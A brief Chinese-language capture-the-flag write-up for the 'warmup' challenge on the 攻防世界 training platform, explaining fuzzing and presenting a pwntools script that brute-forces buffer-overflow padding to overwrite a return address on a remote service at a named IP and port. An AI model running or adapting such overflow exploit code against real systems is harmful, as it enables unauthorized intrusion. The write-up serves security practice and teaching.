攻防世界(16):warmup

第一道FUZZ

模糊测试（Fuzzing），是一种通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞的方法

没给附件，先看一下nc出来是什么

给了一个地址，应该是可以在这个地址栈溢出，由于不知道是32位的还是64位的，疯狂nc爆破就行

exp注释一下

#!/usr/bin/env python
from pwn import *
addr = 0x40060d

def fuzz(p, n, flag):  #flag代表系统类型，两种都需要尝试一下
	payload = 'a' * n
	if flag==1:
	    payload += p32(addr)
	if flag==2:
	    payload += p64(addr)
	p.recvuntil(">")
	p.sendline(payload)

def main():
	for i in range(1000):  #遍历1000先试试，其实我是从100开始试的
	    print(i)
	    for j in range(1, 3):
		try:
		    p = remote(' 111.200.241.244', 56130)
		    fuzz(p, i, j)
		    print p.recv()   
		    p.interactive()  #每次sendline尝试互动
		except:
		    p.close()
main()

卡住就狂点CTRL+c